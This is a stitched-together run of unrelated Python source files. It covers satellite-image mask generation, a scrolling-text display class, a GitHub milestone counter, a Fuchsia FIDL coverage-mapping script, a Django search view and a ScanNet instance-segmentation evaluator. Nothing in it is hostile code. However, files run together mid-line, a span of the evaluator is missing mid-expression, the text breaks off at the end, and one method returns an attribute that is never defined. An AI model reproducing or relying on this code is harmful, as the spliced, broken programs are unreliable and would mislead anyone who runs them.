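    road_gdf = gpd.read_file('roads.geojson')
    mask = road_mask(road_gdf, width=8, meters=True,
                     reference_im='image_tile.tif', burn_value=255)
    # mask shape matches the reference image; road pixels hold 255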
""" # start with required checks and pre-population of values if out_file and not reference_im: raise ValueError( 'If saving output to file, `reference_im` must be provided.') df = _check_df_load(df) if do_transform is None: # determine whether or not transform should be done do_transform = _check_do_transform(df, reference_im, affine_obj) df[geom_col] = df[geom_col].apply(_check_geom) # ensure WKTs are loaded buffered_df = buffer_df_geoms(df, width/2., meters=meters, reference_im=reference_im, geom_col=geom_col, affine_obj=affine_obj) if not do_transform: affine_obj = Affine(1, 0, 0, 0, 1, 0) # identity transform if reference_im: reference_im = _check_rasterio_im_load(reference_im) shape = reference_im.shape if do_transform: affine_obj = reference_im.transform # extract geometries and pair them with burn values if burn_field: if out_type == 'int': feature_list = list(zip(buffered_df[geom_col], buffered_df[burn_field].astype('uint8'))) else: feature_list = list(zip(buffered_df[geom_col], buffered_df[burn_field].astype('uint8'))) else: feature_list = list(zip(buffered_df[geom_col], [burn_value] * len(buffered_df))) output_arr = features.rasterize(shapes=feature_list, out_shape=shape, transform=affine_obj) if min_background_value: output_arr = np.clip(output_arr, min_background_value, np.max(output_arr)) if out_file: meta = reference_im.meta.copy() meta.update(count=1) if out_type == 'int': meta.update(dtype='uint8') with rasterio.open(out_file, 'w', **meta) as dst: dst.write(output_arr, indexes=1) return output_arr def buffer_df_geoms(df, buffer, meters=False, reference_im=None, geom_col='geometry', affine_obj=None): """Buffer geometries within a pd.DataFrame or gpd.GeoDataFrame. Arguments --------- df : :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` A :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` instance with a column containing geometries (identified by `geom_col`). If `df` lacks a ``crs`` attribute (isn't a :class:`geopandas.GeoDataFrame` ) and ``meters=True``, then `reference_im` must be provided for georeferencing. buffer : `int` or `float` The amount to buffer the geometries in `df`. In pixel units unless ``meters=True``. This corresponds to width/2 in mask creation functions. meters : bool, optional Should buffers be in pixel units (default) or metric units (if `meters` is ``True``)? reference_im : `str` or :class:`rasterio.DatasetReader`, optional The path to a reference image covering the same geographic extent as the area labeled in `df`. Provided for georeferencing of pixel coordinate geometries in `df` or conversion of georeferenced geometries to pixel coordinates as needed. Required if `meters` is ``True`` and `df` lacks a ``crs`` attribute. geom_col : str, optional The column containing geometries in `df`. Defaults to ``"geometry"``. affine_obj : `list` or :class:`affine.Affine`, optional Affine transformation to use to convert geoms in `df` from a geographic crs to pixel space. Only provide this argument if `df` is a :class:`geopandas.GeoDataFrame` with coordinates in a georeferenced coordinate space. Ignored if `reference_im` is provided. Returns ------- buffered_df : :class:`pandas.DataFrame` A :class:`pandas.DataFrame` in the original coordinate reference system with objects buffered per `buffer`. See Also -------- road_mask : Function to create road network masks. contact_mask : Function to create masks of contact points between polygons. 
""" if reference_im is not None: reference_im = _check_rasterio_im_load(reference_im) if hasattr(df, 'crs'): orig_crs = _check_crs(df.crs) else: orig_crs = None # will represent pixel crs # Check if dataframe is in the appropriate units and reproject if not if not meters: if hasattr(df, 'crs') and reference_im is not None: # if the df is georeferenced and a reference_im is provided, # use reference_im to transform df to px coordinates df_for_buffer = geojson_to_px_gdf(df.copy(), reference_im) elif hasattr(df, 'crs') and reference_im is None: df_for_buffer = affine_transform_gdf(df.copy(), affine_obj=affine_obj) else: # if it's already in px coordinates df_for_buffer = df.copy() else: # check if the df is in a metric crs if hasattr(df, 'crs'): if crs_is_metric(df): df_for_buffer = df.copy() else: df_for_buffer = reproject(df.copy()) # defaults to UTM else: # assume df is in px coords - use reference_im to georegister if reference_im is not None: df_for_buffer = georegister_px_df(df.copy(), im_path=reference_im) else: raise ValueError('If using `meters=True`, either `df` must be ' 'a geopandas GeoDataFrame or `reference_im` ' 'must be provided for georegistration.') df_for_buffer[geom_col] = df_for_buffer[geom_col].apply( lambda x: x.buffer(buffer)) # return to original crs if _check_crs(getattr(df_for_buffer, 'crs', None)) != orig_crs: if orig_crs is not None and \ getattr(df_for_buffer, 'crs', None) is not None: buffered_df = df_for_buffer.to_crs(orig_crs.to_wkt()) elif orig_crs is None: # but df_for_buffer has one: meters=True case buffered_df = geojson_to_px_gdf(df_for_buffer, reference_im) else: # orig_crs exists, but df_for_buffer doesn't have one buffered_df = georegister_px_df(df_for_buffer, im_path=reference_im, affine_obj=affine_obj, crs=orig_crs) else: buffered_df = df_for_buffer return buffered_df def preds_to_binary(pred_arr, channel_scaling=None, bg_threshold=0): """Convert a set of predictions from a neural net to a binary mask. Arguments --------- pred_arr : :class:`numpy.ndarray` A set of predictions generated by a neural net (generally in ``float`` dtype). This can be a 2D array or a 3D array, in which case it will be convered to a 2D mask output with optional channel scaling (see the `channel_scaling` argument). If a filename is provided instead of an array, the image will be loaded using scikit-image. channel_scaling : `list`-like of `float`s, optional If `pred_arr` is a 3D array, this argument defines how each channel will be combined to generate a binary output. channel_scaling should be a `list`-like of length equal to the number of channels in `pred_arr`. The following operation will be performed to convert the multi-channel prediction to a 2D output :: sum(pred_arr[channel]*channel_scaling[channel]) If not provided, no scaling will be performend and channels will be summed. bg_threshold : `int` or `float`, optional The cutoff to set to distinguish between background and foreground pixels in the final binary mask. Binarization takes place *after* channel scaling and summation (if applicable). Defaults to 0. Returns ------- mask_arr : :class:`numpy.ndarray` A 2D boolean ``numpy`` array with ``True`` for foreground pixels and ``False`` for background. 
""" pred_arr = _check_skimage_im_load(pred_arr).copy() if len(pred_arr.shape) == 3: if pred_arr.shape[0] < pred_arr.shape[-1]: pred_arr = np.moveaxis(pred_arr, 0, -1) if channel_scaling is None: # if scale values weren't provided channel_scaling = np.ones(shape=(pred_arr.shape[-1]), dtype='float') pred_arr = np.sum(pred_arr*np.array(channel_scaling), axis=-1) mask_arr = (pred_arr > bg_threshold).astype('uint8') return mask_arr*255 def mask_to_poly_geojson(pred_arr, channel_scaling=None, reference_im=None, output_path=None, output_type='geojson', min_area=40, bg_threshold=0, do_transform=None, simplify=False, tolerance=0.5, **kwargs): """Get polygons from an image mask. Arguments --------- pred_arr : :class:`numpy.ndarray` A 2D array of integers. Multi-channel masks are not supported, and must be simplified before passing to this function. Can also pass an image file path here. channel_scaling : :class:`list`-like, optional If `pred_arr` is a 3D array, this argument defines how each channel will be combined to generate a binary output. channel_scaling should be a `list`-like of length equal to the number of channels in `pred_arr`. The following operation will be performed to convert the multi-channel prediction to a 2D output :: sum(pred_arr[channel]*channel_scaling[channel]) If not provided, no scaling will be performend and channels will be summed. reference_im : str, optional The path to a reference geotiff to use for georeferencing the polygons in the mask. Required if saving to a GeoJSON (see the ``output_type`` argument), otherwise only required if ``do_transform=True``. output_path : str, optional Path to save the output file to. If not provided, no file is saved. output_type : ``'csv'`` or ``'geojson'``, optional If ``output_path`` is provided, this argument defines what type of file will be generated - a CSV (``output_type='csv'``) or a geojson (``output_type='geojson'``). min_area : int, optional The minimum area of a polygon to retain. Filtering is done AFTER any coordinate transformation, and therefore will be in destination units. bg_threshold : int, optional The cutoff in ``mask_arr`` that denotes background (non-object). Defaults to ``0``. simplify : bool, optional If ``True``, will use the Douglas-Peucker algorithm to simplify edges, saving memory and processing time later. Defaults to ``False``. tolerance : float, optional The tolerance value to use for simplification with the Douglas-Peucker algorithm. Defaults to ``0.5``. Only has an effect if ``simplify=True``. Returns ------- gdf : :class:`geopandas.GeoDataFrame` A GeoDataFrame of polygons. 
""" mask_arr = preds_to_binary(pred_arr, channel_scaling, bg_threshold) if do_transform and reference_im is None: raise ValueError( 'Coordinate transformation requires a reference image.') if do_transform: with rasterio.open(reference_im) as ref: transform = ref.transform crs = ref.crs ref.close() else: transform = Affine(1, 0, 0, 0, 1, 0) # identity transform crs = rasterio.crs.CRS() mask = mask_arr > bg_threshold mask = mask.astype('uint8') polygon_generator = features.shapes(mask_arr, transform=transform, mask=mask) polygons = [] values = [] # pixel values for the polygon in mask_arr for polygon, value in polygon_generator: p = shape(polygon).buffer(0.0) if p.area >= min_area: polygons.append(shape(polygon).buffer(0.0)) values.append(value) polygon_gdf = gpd.GeoDataFrame({'geometry': polygons, 'value': values}, crs=crs.to_wkt()) if simplify: polygon_gdf['geometry'] = polygon_gdf['geometry'].apply( lambda x: x.simplify(tolerance=tolerance) ) # save output files if output_path is not None: if output_type.lower() == 'geojson': if len(polygon_gdf) > 0: polygon_gdf.to_file(output_path, driver='GeoJSON') else: save_empty_geojson(output_path, polygon_gdf.crs.to_epsg()) elif output_type.lower() == 'csv': polygon_gdf.to_csv(output_path, index=False) return polygon_gdf def crs_is_metric(gdf): """Check if a GeoDataFrame's CRS is in metric units.""" units = str(gdf_get_projection_unit(gdf)).strip().lower() if units in ['"meter"', '"metre"', "'meter'", "'meter'", 'meter', 'metre']: return True else: return False def _check_do_transform(df, reference_im, affine_obj): """Check whether or not a transformation should be performed.""" try: crs = getattr(df, 'crs') except AttributeError: return False # if it doesn't have a CRS attribute if not crs: return False # return False for do_transform if crs is falsey elif crs and (reference_im is not None or affine_obj is not None): # if the input has a CRS and another obj was provided for xforming return True def instance_mask(df, out_file=None, reference_im=None, geom_col='geometry', do_transform=None, affine_obj=None, shape=(900, 900), out_type='int', burn_value=255, burn_field=None, nodata_value=0): """Convert a dataframe of geometries to a pixel mask. Arguments --------- df : :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` A :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` instance with a column containing geometries (identified by `geom_col`). If the geometries in `df` are not in pixel coordinates, then `affine` or `reference_im` must be passed to provide the transformation to convert. out_file : str, optional Path to an image file to save the output to. Must be compatible with :class:`rasterio.DatasetReader`. If provided, a `reference_im` must be provided (for metadata purposes). reference_im : :class:`rasterio.DatasetReader` or `str`, optional An image to extract necessary coordinate information from: the affine transformation matrix, the image extent, etc. If provided, `affine_obj` and `shape` are ignored. geom_col : str, optional The column containing geometries in `df`. Defaults to ``"geometry"``. do_transform : bool, optional Should the values in `df` be transformed from geospatial coordinates to pixel coordinates? Defaults to ``None``, in which case the function attempts to infer whether or not a transformation is required based on the presence or absence of a CRS in `df`. If ``True``, either `reference_im` or `affine_obj` must be provided as a source for the the required affine transformation matrix. 
affine_obj : `list` or :class:`affine.Affine`, optional Affine transformation to use to convert from geo coordinates to pixel space. Only provide this argument if `df` is a :class:`geopandas.GeoDataFrame` with coordinates in a georeferenced coordinate space. Ignored if `reference_im` is provided. shape : tuple, optional An ``(x_size, y_size)`` tuple defining the pixel extent of the output mask. Ignored if `reference_im` is provided. out_type : 'float' or 'int' burn_value : `int` or `float`, optional The value to use for labeling objects in the mask. Defaults to 255 (the max value for ``uint8`` arrays). The mask array will be set to the same dtype as `burn_value`. Ignored if `burn_field` is provided. burn_field : str, optional Name of a column in `df` that provides values for `burn_value` for each independent object. If provided, `burn_value` is ignored. nodata_value : `int` or `float`, optional The value to use for nodata pixels in the mask. Defaults to 0 (the min value for ``uint8`` arrays). Used if reference_im nodata value is a float. Ignored if reference_im nodata value is an int or if reference_im is not used. Take care when visualizing these masks, the nodata value may cause labels to not be visualized if nodata values are automatically masked by the software. Returns ------- mask : :class:`numpy.array` A pixel mask with 0s for non-object pixels and `burn_value` at object pixels. `mask` dtype will coincide with `burn_value`. """ # TODO: Refactor to remove some duplicated code here and in other mask fxns if out_file and not reference_im: raise ValueError( 'If saving output to file, `reference_im` must be provided.') df = _check_df_load(df) if len(df) == 0: # for saving an empty mask. reference_im = _check_rasterio_im_load(reference_im) shape = reference_im.shape return np.zeros(shape=shape, dtype='uint8') if do_transform is None: # determine whether or not transform should be done do_transform = _check_do_transform(df, reference_im, affine_obj) df[geom_col] = df[geom_col].apply(_check_geom) # load in geoms if wkt if not do_transform: affine_obj = Affine(1, 0, 0, 0, 1, 0) # identity transform if reference_im: reference_im = _check_rasterio_im_load(reference_im) shape = reference_im.shape if do_transform: affine_obj = reference_im.transform # extract geometries and pair them with burn values if burn_field: if out_type == 'int': feature_list = list(zip(df[geom_col], df[burn_field].astype('uint8'))) else: feature_list = list(zip(df[geom_col], df[burn_field].astype('float32'))) else: feature_list = list(zip(df[geom_col], [burn_value]*len(df))) if out_type == 'int': output_arr = np.empty(shape=(shape[0], shape[1], len(feature_list)), dtype='uint8') else: output_arr = np.empty(shape=(shape[0], shape[1], len(feature_list)), dtype='float32') # initialize the output array for idx, feat in enumerate(feature_list): output_arr[:, :, idx] = features.rasterize([feat], out_shape=shape, transform=affine_obj) if reference_im: reference_im = _check_rasterio_im_load(reference_im) try: bad_data_mask = (reference_im.read() == reference_im.nodata).any(axis=0) # take logical and along all dims so that all pixxels not -9999 across bands except AttributeError as ae: # raise another, more verbose AttributeError raise AttributeError("A nodata value is not defined for the source image. 
Make sure the reference_im has a nodata value defined.") from ae if len(bad_data_mask.shape) > 2: bad_data_mask = np.dstack([bad_data_mask]*output_arr.shape[2]) output_arr = np.where(bad_data_mask, 0, output_arr) # mask is broadcasted to filter labels where there are non-nan image values if out_file: meta = reference_im.meta.copy() meta.update(count=output_arr.shape[-1]) if out_type == 'int': meta.update(dtype='uint8') if isinstance(meta['nodata'], float): meta.update(nodata=nodata_value) with rasterio.open(out_file, 'w', **meta) as dst: for c in range(1, 1 + output_arr.shape[-1]): dst.write(output_arr[:, :, c-1], indexes=c) dst.close() return output_arr def geojsons_to_masks_and_fill_nodata(rtiler, vtiler, label_tile_dir, fill_value=0): """ Converts tiled vectors to raster labels and fills nodata values in raster and vector tiles. This function must be run after a raster tiler and vector tiler have already been initialized and the `.tile()` method for each has been called to generate raster and vector tiles. Geojson labels are first converted to rasterized masks, then the labels are set to 0 where the reference image, the corresponding image tile, has nodata values. Then, nodata areas in the image tile are filled in place with the fill_value. Only works for rasterizing all geometries as a single category with a burn value of 1. See test_tiler_fill_nodata in tests/test_tile/test_tile.py for an example. Args ------- rtiler : RasterTiler The RasterTiler that has had it's `.tile()` method called. vtiler : VectorTiler The VectorTiler that has had it's `.tile()` method called. label_tile_dir : str The folder path to save rasterized labels. This is created if it doesn't already exist. fill_value : str, optional The value to use to fill nodata values in images. Defaults to 0. Returns ------- rasterized_label_paths : list A list of the paths to the rasterized instance masks. """ rasterized_label_paths = [] print("starting label mask generation") if not os.path.exists(label_tile_dir): os.mkdir(label_tile_dir) for img_tile, geojson_tile in tqdm(zip(sorted(rtiler.tile_paths), sorted(vtiler.tile_paths))): fid = os.path.basename(geojson_tile).split(".geojson")[0] rasterized_label_path = os.path.join(label_tile_dir, fid + ".tif") rasterized_label_paths.append(rasterized_label_path) gdf = gpd.read_file(geojson_tile) # gdf.crs = rtiler.raster_bounds_crs # add this because gdfs can't be saved with wkt crs arr = instance_mask(gdf, out_file=rasterized_label_path, reference_im=img_tile, geom_col='geometry', do_transform=None, out_type='int', burn_value=1, burn_field=None) # this saves the file, unless it is empty in which case we deal with it below. if not arr.any(): # in case no instances in a tile we save it with "empty" at the front of the basename with rasterio.open(img_tile) as reference_im: meta = reference_im.meta.copy() reference_im.close() meta.update(count=1) meta.update(dtype='uint8') if isinstance(meta['nodata'], float): meta.update(nodata=0) rasterized_label_path = os.path.join(label_tile_dir, "empty_" + fid + ".tif") with rasterio.open(rasterized_label_path, 'w', **meta) as dst: dst.write(np.expand_dims(arr, axis=0)) dst.close() rtiler.fill_all_nodata(nodata_fill=fill_value) return rasterized_label_paths """ Class representing text that scrolls if it is too long. """ from Model import Time """ Class for scrolling text. """ class ScrollingText(): """ Creates the scrolling text. 
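text is the string to display; maxLength is the number of characters that fit on the display; shiftTime is the interval (in whatever units Time.getCurrentTimestamp returns) between one-character shifts; sideCharacter pads both sides when the text already fits; scrollingSpacing is the number of blank characters inserted between repetitions while scrolling.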
""" def __init__(self,text,maxLength,shiftTime,sideCharacter = "",scrollingSpacing=1): self.text = text self.maxLength = maxLength self.shiftTime = shiftTime self.startTime = Time.getCurrentTimestamp() self.sideCharacter = sideCharacter self.scrollingSpacing = scrollingSpacing """ Returns if the text fits. """ def textFits(self): return len(self.text) <= self.maxLength """ Returns the current text offset. """ def getCurrentOffset(self): if self.textFits(): return 0 else: return int(((Time.getCurrentTimestamp() - self.startTime) / self.shiftTime) % (len(self.text) + self.scrollingSpacing)) """ Returns the current string to display. """ def getCurrentText(self): if self.textFits(): # Center the text. signsBefore = int((self.maxLength - len(self.text)) / 2) signsAfter = self.maxLength - signsBefore - len(self.text) # Set the text. return (self.sideCharacter * signsBefore) + self.text + (self.sideCharacter * signsAfter) else: # Cut the text. doubleText = self.text + (" " * self.scrollingSpacing) + self.text offset = self.getCurrentOffset() return doubleText[offset:offset + self.maxLength]import os import requests import sys number = sys.argv[1] # Milestone number repo = os.environ['GITHUB_REPOSITORY'] # As in, user/repo token = os.environ['GITHUB_TOKEN'] # Github API token print( f"Fetching number of milestone {number} of repo '{repo}'", file = sys.stderr ) url = f'https://api.github.com/repos/{repo}/milestones/{number}' headers = { 'Accept': 'application/vnd.github.v3+json', 'Authorization': f'token {token}' } r = requests.get( url, headers = headers ) if r.status_code != 200: raise Exception( f"HTTP request failed: code {r.status_code}" ) r = r.json() open_issues = r['open_issues'] print( f"Open issues: {open_issues}", file = sys.stderr ) print( open_issues )#!/usr/bin/env python3.8 # Copyright 2021 The Fuchsia Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """A helper script for generating a map of FIDL mangled C++ function names to fully qualified APIs. The output of the script is used for correlating CTS C++ function coverage data (keyed by mangled function names) to FIDL APIs. """ import argparse import json import os import re import subprocess import sys # FIDL method name annotation exists 1-line before declaration. ANNOTATION_OFFSET = 1 class DwarfdumpStreamingParser: """Helper class to parse streaming output from `llvm-dwarfdump`.""" DWARF_TAG_MATCHER = re.compile(r'^(0x\S+):\s+(\S+)') SUBPROGRAM_ATTR_MATCHER = re.compile(r'^\s+(\S+)\s+\((.+)\)') SUBPROGRAM_TAG = 'DW_TAG_subprogram' def __init__(self): # Instance variables to track parser state from line to line. self._cur_addr = None self._in_subprogram_block = False # Dict of compilation unit addresses to their respective attributes. self._subprograms_dict = {} def parse_line(self, line): """Parses a line from `llvm-dwarfdump`'s output. Args: line (string): A line of `llvm-dwarfdump` output. """ if self._in_subprogram_block: m = self.SUBPROGRAM_ATTR_MATCHER.search(line) if m: attr, value = m.group(1), m.group(2) self._subprograms_dict[self._cur_addr][attr] = value else: # Dwarfdump entries are separated by a newline. # So the first unmatched line after entering a subprogram block # marks the end of the subprogram block. 
self._in_subprogram_block = False return m = self.DWARF_TAG_MATCHER.search(line) if m: addr, tag = m.group(1), m.group(2) if tag == self.SUBPROGRAM_TAG: self._in_subprogram_block = True self._cur_addr = addr self._subprograms_dict[self._cur_addr] = {} def get_subprograms(self): """Returns the subprograms that have been successfully parsed. Returns: A dict(string,dict) containing subprogram addresses and respective dwarfdump attributes. """ return self._subprograms_dict class FidlApiResolver: """Helper class to resolve mangled C++ function names to corresponding FIDL APIs. For each mangled C++ function that's associated with a `fidl.h` file, we use information provided in dwarfdump's output to navigate to where the function is declared in the generated source file (FIDL binding header file). Once there, we can simply read the Fully-Qualified FIDL API name annotation that's set a fixed number of lines above where the function is declared. Args: subprograms_dict (dict(string,dict)): Dict containing subprogram addresses and dwarfdump attributes. api_mapping_dict (dict(string,string)): Dict containing mapping between mangled function names and fully qualified FIDL names. """ def __init__(self, subprograms_dict, api_mapping_dict): self._subprograms_dict = subprograms_dict self._api_mapping_dict = api_mapping_dict def add_new_mappings(self): """Add new mangled_name to FIDL API mapping if it doesn't already exist. New mappings are added to `self._api_mapping_dict`. """ for _, info in self._subprograms_dict.items(): # Only care about subprograms with file and line number information. if 'DW_AT_decl_file' not in info or 'DW_AT_decl_line' not in info: continue # Only process FIDL binding headers. if not info['DW_AT_decl_file'].endswith('fidl.h"'): continue mangled_name = info.get('DW_AT_linkage_name') or info.get( 'DW_AT_name') if not mangled_name: # Ignore subprograms with no names. continue sanitized_mangled_name = mangled_name.strip('"') if sanitized_mangled_name not in self._api_mapping_dict: sanitized_filepath = info['DW_AT_decl_file'].strip('"') line_num = int(info['DW_AT_decl_line']) self._add_mapping_entry( sanitized_mangled_name, sanitized_filepath, line_num) def _add_mapping_entry(self, mangled_name, filepath, line_num): """Resolve mangled_name to FIDL API mapping and add as mapping entry. Resolve mapping by opening the file where the function is defined, and reading an annotation that's a fixed-number of lines above the line of function declaration. Args: mangled_name (string): Mangled C++ function name to map to a FIDL API. filepath (string): Path to generated FIDL binding file that declares the function related to the `mangled_name`. line_num (int): The line number in the FIDL binding file where the function is declared. """ fidl_api_annotation = '' cur_line = 0 with open(filepath) as f: while cur_line != line_num - ANNOTATION_OFFSET: fidl_api_annotation = f.readline().strip() cur_line += 1 if 'cts-coverage-fidl-name' not in fidl_api_annotation: # This is not a FIDL API of interest. return # Annotation format: "// cts-coverage-fidl-name:" self._api_mapping_dict[mangled_name] = fidl_api_annotation.split(':')[1] def get_mapping(self): """Returns the mangled-name-to-FIDL-API mapping. Returns: A dict(str,str) containing mangled function names and their corresponding fully qualified FIDL API names. 
""" return self._mapping def main(): parser = argparse.ArgumentParser() parser.add_argument( '--input', help= 'File that contains filepaths to unstripped libraries & executables relative to the build dir.', required=True) parser.add_argument( '--output', help='Path to the output file containing FIDL to mangled name mapping.', required=True) parser.add_argument( '--depfile', help='Path to the depfile generated for GN.', required=True) parser.add_argument( '--dwarfdump', help='Path to `llvm-dwarfdump` executable.', required=True) args = parser.parse_args() depfile_inputs = [] with open(args.input) as f: depfile_inputs = f.read().splitlines() # Write depfile. with open(args.depfile, 'w') as f: f.write('%s: %s' % (args.output, ' '.join(sorted(depfile_inputs)))) # Generate mapping. fidl_mangled_name_to_api_mapping = {} for unstripped_binary in depfile_inputs: dwarddump_cmd = [args.dwarfdump, unstripped_binary] parser = DwarfdumpStreamingParser() # TODO(chok): Add multithreaded support for concurrently processing each unstripped binary. with subprocess.Popen(dwarddump_cmd, stdout=subprocess.PIPE) as p: for line in p.stdout: parser.parse_line(line.decode()) resolver = FidlApiResolver( parser.get_subprograms(), fidl_mangled_name_to_api_mapping) resolver.add_new_mappings() # Write output. with open(args.output, 'w') as f: f.write(json.dumps(fidl_mangled_name_to_api_mapping, indent=2)) if __name__ == '__main__': sys.exit(main()) digitalfabrik/buergerinnendatenfinderdatenfinder/gui/views.py from django.shortcuts import render from .forms import CitizenDateForm from .models import CitizenDate DATE_TYPES = { 'telephone': 'Telefonnummer', 'e-mail': 'E-Mail-Adresse', 'zipcode': 'Postleitzahl', } def index(request): context = {} if request.method == "POST": cdf = CitizenDateForm( request.POST ) if cdf.is_valid(): cdf.save() else: print(cdf.type_hash) cd = CitizenDate.objects.filter(type_hash=cdf.type_hash) context["date_type"] = DATE_TYPES[request.POST["date_type"]] context["cd"] = cd context["all_data"] = CitizenDate.objects.filter() context["citizen_date_form"] = CitizenDateForm() return render(request, "search.html", context) hierplace/__init__.py from .HierPlace import hier_place # Evaluates semantic instance task # Adapted from the CityScapes evaluation: https://github.com/mcordts/cityscapesScripts/tree/master/cityscapesscripts/evaluation # Input: # - path to .txt prediction files # - path to .txt ground truth files # - output file to write results to # Each .txt prediction file look like: # [(pred0) rel. path to pred. mask over verts as .txt] [(pred0) label id] [(pred0) confidence] # [(pred1) rel. path to pred. mask over verts as .txt] [(pred1) label id] [(pred1) confidence] # [(pred2) rel. path to pred. mask over verts as .txt] [(pred2) label id] [(pred2) confidence] # ... # # NOTE: The prediction files must live in the root of the given prediction path. # Predicted mask .txt files must live in a subfolder. # Additionally, filenames must not contain spaces. # The relative paths to predicted masks must contain one integer per line, # where each line corresponds to vertices in the *_vh_clean_2.ply (in that order). # Non-zero integers indicate part of the predicted instance. # The label ids specify the class of the corresponding mask. # Confidence is a float confidence score of the mask. # # Note that only the valid classes are used for evaluation, # i.e., any ground truth label not in the valid label set # is ignored in the evaluation. 
# # example usage: evaluate_semantic_instance.py --scan_path [path to scan data] --output_file [output file] # python imports import math import os, sys, argparse import inspect from copy import deepcopy try: import numpy as np except: print("Failed to import numpy package.") sys.exit(-1) currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) parentdir = os.path.dirname(currentdir) sys.path.insert(0,parentdir) import util import util_3d parser = argparse.ArgumentParser() parser.add_argument('--pred_path', required=True, help='path to directory of predicted .txt files') parser.add_argument('--gt_path', required=True, help='path to directory of gt .txt files') parser.add_argument('--output_file', default=None, help='optional output file') opt = parser.parse_args() # ---------- Label info ---------- # CLASS_LABELS = ['wall','floor','cabinet','bed','chair','sofa','table','door','window','bookshelf','picture','counter','blinds','desk','shelves','curtain','dresser','pillow','mirror','floor_mat','clothes','ceiling','books','refridgerator','television','paper','towel','shower_curtain','box','whiteboard','person','night_stand','toilet','sink','lamp','bathtub','bag','otherstructure','otherfurniture','otherprop'] VALID_CLASS_IDS = np.array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40 ]) ID_TO_LABEL = {} LABEL_TO_ID = {} for i in range(len(VALID_CLASS_IDS)): LABEL_TO_ID[CLASS_LABELS[i]] = VALID_CLASS_IDS[i] ID_TO_LABEL[VALID_CLASS_IDS[i]] = CLASS_LABELS[i] # ---------- Evaluation params ---------- # # overlaps for evaluation opt.overlaps = np.append(np.arange(0.5,0.95,0.05), 0.25) # minimum region size for evaluation [verts] opt.min_region_sizes = np.array( [ 100 ] ) # distance thresholds [m] opt.distance_threshes = np.array( [ float('inf') ] ) # distance confidences opt.distance_confs = np.array( [ -float('inf') ] ) def evaluate_matches(matches): overlaps = opt.overlaps min_region_sizes = [ opt.min_region_sizes[0] ] dist_threshes = [ opt.distance_threshes[0] ] dist_confs = [ opt.distance_confs[0] ] # results: class x overlap ap = np.zeros( (len(dist_threshes) , len(CLASS_LABELS) , len(overlaps)) , np.float ) for di, (min_region_size, distance_thresh, distance_conf) in enumerate(zip(min_region_sizes, dist_threshes, dist_confs)): for oi, overlap_th in enumerate(overlaps): pred_visited = {} for m in matches: for p in matches[m]['pred']: for label_name in CLASS_LABELS: for p in matches[m]['pred'][label_name]: if 'filename' in p: pred_visited[p['filename']] = False for li, label_name in enumerate(CLASS_LABELS): y_true = np.empty(0) y_score = np.empty(0) hard_false_negatives = 0 has_gt = False has_pred = False for m in matches: pred_instances = matches[m]['pred'][label_name] gt_instances = matches[m]['gt'][label_name] # filter groups in ground truth gt_instances = [ gt for gt in gt_instances if gt['instance_id']>=1000 and gt['vert_count']>=min_region_size and gt['med_dist']<=distance_thresh and gt['dist_conf']>=distance_conf ] if gt_instances: has_gt = True if pred_instances: has_pred = True cur_true = np.ones ( len(gt_instances) ) cur_score = np.ones ( len(gt_instances) ) * (-float("inf")) cur_match = np.zeros( len(gt_instances) , dtype=np.bool ) # collect matches for (gti,gt) in enumerate(gt_instances): found_match = False # num_pred = len(gt['matched_pred']) for pred in gt['matched_pred']: # greedy assignments if pred_visited[pred['filename']]: continue overlap = 
float(pred['intersection']) / (gt['vert_count']+pred['vert_count']-pred['intersection']) if overlap > overlap_th: confidence = pred['confidence'] # if already have a prediction for this gt, # the prediction with the lower score is automatically a false positive if cur_match[gti]: max_score = max( cur_score[gti] , confidence ) min_score = min( cur_score[gti] , confidence ) cur_score[gti] = max_score # append false positive cur_true = np.append(cur_true,0) cur_score = np.append(cur_score,min_score) cur_match = np.append(cur_match,True) # otherwise set score else: found_match = True cur_match[gti] = True cur_score[gti] = confidence pred_visited[pred['filename']] = True if not found_match: hard_false_negatives += 1 # remove non-matched ground truth instances cur_true = cur_true [ cur_match==True ] cur_score = cur_score[ cur_match==True ] # collect non-matched predictions as false positive for pred in pred_instances: found_gt = False for gt in pred['matched_gt']: overlap = float(gt['intersection']) / (gt['vert_count']+pred['vert_count']-gt['intersection']) if overlap > overlap_th: found_gt = True break if not found_gt: num_ignore = pred['void_intersection'] for gt in pred['matched_gt']: # group? if gt['instance_id'] < 1000: num_ignore += gt['intersection'] # small ground truth instances if gt['vert_count'] < min_region_size or gt['med_dist']>distance_thresh or gt['dist_conf'] 0: gt_copy = gt_inst.copy() pred_copy = pred_instance.copy() gt_copy['intersection'] = intersection pred_copy['intersection'] = intersection matched_gt.append(gt_copy) gt2pred[label_name][gt_num]['matched_pred'].append(pred_copy) pred_instance['matched_gt'] = matched_gt num_pred_instances += 1 pred2gt[label_name].append(pred_instance) return gt2pred, pred2gt def print_results(avgs): sep = "" col1 = ":" lineLen = 64 print("") print("#"*lineLen) line = "" line += "{:<15}".format("what" ) + sep + col1 line += "{:>15}".format("AP" ) + sep line += "{:>15}".format("AP_50%" ) + sep line += "{:>15}".format("AP_25%" ) + sep print(line) print("#"*lineLen) for (_,label_name) in enumerate(CLASS_LABELS): ap_avg = avgs["classes"][label_name]["ap"] ap_50o = avgs["classes"][label_name]["ap50%"] ap_25o = avgs["classes"][label_name]["ap25%"] line = "{:<15}".format(label_name) + sep + col1 line += sep + "{:>15.3f}".format(ap_avg ) + sep line += sep + "{:>15.3f}".format(ap_50o ) + sep line += sep + "{:>15.3f}".format(ap_25o ) + sep print(line) all_ap_avg = avgs["all_ap"] all_ap_50o = avgs["all_ap_50%"] all_ap_25o = avgs["all_ap_25%"] print("-"*lineLen) line = "{:<15}".format("average") + sep + col1 line += "{:>15.3f}".format(all_ap_avg) + sep line += "{:>15.3f}".format(all_ap_50o) + sep line += "{:>15.3f}".format(all_ap_25o) + sep print(line) print("") def write_result_file(avgs, filename): _SPLITTER = ',' with open(filename, 'w') as f: f.write(_SPLITTER.join(['class', 'class id', 'ap', 'ap50', 'ap25']) + '\n') for i in range(len(VALID_CLASS_IDS)): class_name = CLASS_LABELS[i] class_id = 